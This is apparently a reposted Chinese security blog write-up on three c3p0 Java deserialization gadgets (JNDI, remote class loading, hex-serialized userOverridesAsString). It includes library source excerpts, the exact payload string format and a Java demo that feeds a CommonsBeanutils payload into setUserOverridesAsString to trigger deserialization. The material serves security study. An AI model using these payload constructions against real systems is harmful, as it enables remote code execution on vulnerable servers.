c3p0的三个gadget的学习

admin 2024年10月28日23:59:04评论14 views字数 2938阅读9分47秒阅读模式

c3p0的三个gadget的学习

目前c3p0有三种方式getshell

  • 加载远程类
  • jndi
  • hex序列化字节加载器

前两个可以放在一起学习,在com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject,可以看到,如果是IndirectlySerialized的实例就会去调用getObject方法

123
if (o instanceof IndirectlySerialized) {    o = ((IndirectlySerialized)o).getObject();}

而它的实现类只有一个com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized,我们可以看看

c3p0的三个gadget的学习

触发jndi

很明显如果contextName不为空,则会触发,这里没必要继续说下去了

加载远程类

接下来是第二个,这也是ysoserial本身集成的一个payload,继续往下看,ReferenceableUtils.referenceToObject,也是很明显通过URLClassloader加载远程类,并且默认初始化了,因此可以直接在静态块里面放入恶意数据

c3p0的三个gadget的学习

关于writeObject的话,以ysoserial的为例,PoolSource implements ConnectionPoolDataSource, Referenceable,只要不实现序列化接口,并实现getReference方法返回我们的Reference对象即可,也是很简单的

hex序列化字节加载器

这个更多会用到在fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等里面配合使用

当在userOverridesAsString当中设置了序列化数据后,当调用set方法setUpPropertyListeners时就能触发,而这个监听器正好在设置完userOverridesAsString就会调用

c3p0的三个gadget的学习

c3p0的三个gadget的学习

可以看到里面对序列化数据的处理

123456789
public static Map parseUserOverridesAsString(String userOverridesAsString) throws IOException, ClassNotFoundException {    if (userOverridesAsString != null) {        String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);        byte[] serBytes = ByteUtils.fromHexAscii(hexAscii);        return Collections.unmodifiableMap((Map)SerializableUtils.fromByteArray(serBytes));    } else {        return Collections.EMPTY_MAP;    }}

最后触发原生反序列化

c3p0的三个gadget的学习

后面才发现又个地方比较坑,在com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString

1
String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);

这里会把最后一位吃了有点恶心,因此构造payload的时候要像这样

1
String payload = "HexAsciiSerializedMap:"+HexString+":";

这里给个demo方便测试

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152
import com.govuln.deserialization.CB1;import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;import hudson.remoting.Base64;import javassist.ClassPool;import javassist.CtClass;import org.python.antlr.ast.Str;import java.io.*;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.lang.reflect.Modifier;import java.util.HashSet;import java.util.LinkedList;import java.util.PriorityQueue;public class Test {    public static byte[] toByteArray(InputStream in) throws IOException {        byte[] classBytes;        classBytes = new byte[in.available()];        in.read(classBytes);        in.close();        return classBytes;    }    public static String bytesToHexString(byte[] bArray, int length) {        StringBuffer sb = new StringBuffer(length);        for(int i = 0; i < length; ++i) {            String sTemp = Integer.toHexString(255 & bArray[i]);            if (sTemp.length() < 2) {                sb.append(0);            }            sb.append(sTemp.toUpperCase());        }        return sb.toString();    }    public static void main(String[] args) throws Exception {        byte[] data = CB1.getPayload();        String HexString = bytesToHexString(data, data.length);        System.out.println(HexString.length());        String payload = "HexAsciiSerializedMap:"+HexString+":";        WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new WrapperConnectionPoolDataSource();        wrapperConnectionPoolDataSource.setUserOverridesAsString(payload);    }}

- source:y4tacker

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日23:59:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   c3p0的三个gadget的学习https://cn-sec.com/archives/3315060.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息